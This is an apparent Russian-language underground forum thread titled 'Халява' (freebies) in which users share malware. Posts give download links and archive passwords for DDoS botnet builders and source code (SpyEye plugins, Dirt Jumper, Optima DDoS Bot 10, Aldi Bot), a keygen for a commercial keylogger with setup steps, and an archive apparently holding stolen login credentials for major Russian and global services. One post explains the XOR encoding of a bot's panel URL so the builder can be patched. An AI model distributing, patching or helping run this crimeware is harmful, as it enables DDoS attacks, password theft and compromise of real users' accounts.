Халява

Ar3s

Старожил форума
Легенда
Регистрация
30.12.2004
Сообщения
3 357
Реакции
1 404
Давно наши посетители просили создать топик в котором можно выкидывать в паблик или просто делиться всем, что душе угодно.

Отныне такой топ существует. И на него вешаю пожизненный стик.
 
Хм, тема гуд! как раз в тему - попиарицца можно, да и вообще покреативить я люблю ;)

Исходный код ddos плагина SpyEye
http://demonteam.narod.ru/download/P1.rar
PASS: 666
Подробнее узнать, откуда ноги растут, можно здесь:
http://xss.pro/index.php?topic=21847

А вообще greenzy молодец, его посты мне в движуху быстро помогли въехать
ЗЫ: когда научусь плюсы ставить, обязательно плюсану! :)
 
Dirt Jumper

А зарелизю-ка я чо-нить дельфовое, бгг... :D

Целых три версии "очередного знаменитого ддос бота всех времен и народов", ценник сего творения был аж 600 у.е. или даже больше...

Правите конфиг и запускаете инсталл, в 3-ей версии я запарился разгадывать алгосы шифрования адреса админки и просто пропатчил ехе, т.ч адрес там в открытом виде и билдер для удобства.

http://www.sendspace.com/file/h5cagc
pass - apocx.nulled[.]ws

Распространяйте :shit:
 
Optima DDoS Bot 10

image_4ea7ae54b1922.jpg


Изменения относительно 9 версии:
  • Добавлен UDP DDoS.



  • Значительно усилен HTTP DDoS.



  • Значительно усилен ICMP DDoS.



  • Улучшен граббер паролей. Теперь он умеет "грабить" Google Chrome, Safari и последние версии браузера Opera. В целом, была повышена стабильность работы данного модуля. Кроме того, данный модуль научился сам отгружать пароли, теперь его не нужно "просить" об этом командой. Также, данный модуль получил собственное название - "ThiefX".



  • Написан Back-Connect Socks 5 модуль. Данный модуль также получил собственное название - "Tunnel"



  • Написан модуль, позволяющий менять hosts файл в режиме онлайн. Данный модуль также получил собственное название - "Substitution".



  • Улучшена процедура внедрения и закрепления бота в системе. Теперь найти и удалить его стало еще сложнее.



  • Благодаря очень хорошей оптимизации кода удалось сохранить хороший вес продукта: 30-50 кб. в упакованном виде и 90-130 кб. в распакованном, в зависимости
    от наличия тех или иных модулей.




Бот попал в паблик и был слит с хакерс.ру. В архиве находится админка + билдер. Всё работает, без клея с троями. Радуемся.
************************************************************************^
Скачать Optima DDoS Bot 10 *
************************************************************************^
Mirror1
Mirror2+passwd:dlab.org
MultiMirror~10 url's download the file
pass: 0pt!m@_10
Источник: Forum.ProLogic.su
 
http://www.datafilehost.com/download-fbc374f4.html

SpyEye 1.3.45 Builder + Loader
лоадер тот самый, который кривой.
Тем кому удавалось его запустить доставались билды со сломанным socks5.

Поделитесь плагином vnc к спаю.
 
Исходники Aldi Bot`а на Delphi
http://www.xup.in/dl,14503925/SRC_Aldi_Bot_v2.rar
PASS: till7aldiftw
И панель
http://www.xup.in/dl,98742908/Panel.rar/

Источник: http://wasm.ru/forum/viewtopic.php?id=42487 - сорцы aldi bot малобюджетного троя

P. S.
Странно, что у нас такие релизенги пропускают, хотя бы ссылкой обозначали если кто первый увидит
Сам бот в плане юзанья вряд ли подойдет, разве что если только хорошо допилить, а вот исходники по изучать...
 
[mod][Ar3s:] Напонимаю!
Топ не для того что бы выражать свои благодарности и т.д.
Хотите сказать спасибо - плюсаните в репу или ПМ отпишитесь.[/mod]
 
И не будет,потому как в оригинальном билде вот так:
Код:
0006FBAC  http://biz3nyrpppvkrm8ji6ru.net/gallery/task.php?
А в патченном вот так:
Код:
 http://yandex.ru/admin/admin.php?file=/task.php?
Просто линк нужно правильно формировать.
 
Распакуйте билдер (там fsg пакер) и поправьте смещение для линка.
Алгоритм там простецкий, сигнатура для "http://" ищется тривиально, если знать, что все байты начиная со второго ксорятся подряд.

Пример:

Шифровка:
Строка: "http://".
Ключ: 65h.
Алгоритм:
Первым байтом следует ключ, т.е 65h, дальше первый байт исходной строки ксорится с ключом.
"h" xor key = 68h xor 65h = 0Dh

Теперь выглядит так: 65h, 0Dh.

дальше всё просто: берётся второй байт и ксорится со следующим.
"h" xor "t" = 68h xor 74h = 1Ch
"t" xor "t" = 74h xor 74h = 0h
"t" xor "p" = 74h xor 70h = 4h
"p" xor ":" = 70h xor 3ah = 4ah
":" xor "/" = 3ah xor 2fh = 15h
"/" xor "/" = 2fh xor 2fh = 0h

шифрованная строка: 65h, 0Dh, 1Ch, 0h, 4h, 4ah, 15h, 0h.

Расшифровка:
Данные: 65h, 0Dh, 1Ch, 0h, 4h, 4ah, 15h, 0h.
Алгоритм:
65h xor 0Dh = "h" (68h)
"h" xor 1Ch = "t"
"t" xor 0 = "t"
"t" xor 4 = "p"
"p" xor 4a = ":"
":" xor 15h = "/"
"/" xor 0 = "/"

Получили: "http://"

P.S: Ввиду недоработанности алгоритма( это ещё легко сказано ), в памяти можно искать сигнатуру байт: 1Ch, 0h, 4h, 4ah, 15h, 0h.
При этом поиск куска кода, отвечающего за расшифровку данных становится обыденным делом :).

Prado
У тебя сообщений: 0 на 28 ноября 2011г, как ты получил скрытый пароль ?
 
Keylogger Detective

Небольшой релиз от меня :P

Закейгенил сегодня данный софт, честно говоря качество кода самого кейлоггера - просто [мат]ец, но и цена соответствующая :D

Сайт кейлоггера:

Версия - 2.2.9.709 (за 1000 0 рублей) :eek:

Качаем и радуемся:
http://narod.ru/disk/32498509001/detective.7z.html
pass - apocx.nulled[.]ws

Инструкция:
- регаем мыло на яндексе или майлру
- вбиваем в кейлоггер данные по мылу
- вбиваем в кейген мыло
- серийник из кейгена вставляем в кейлоггер

И Pro версия, в догонку:
http://zalil.ru/32170519

з.ы.: и да, антивирусы будут говорить, что это вирус, очевидно же еба :cool:
 
небольшая подборка свеженькой халявы: гугл, яднекс, мылору, одноклассники, контакте. пароль damagelab!
 

Вложения

  • logs.zip
    26 КБ · Просмотры: 163


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх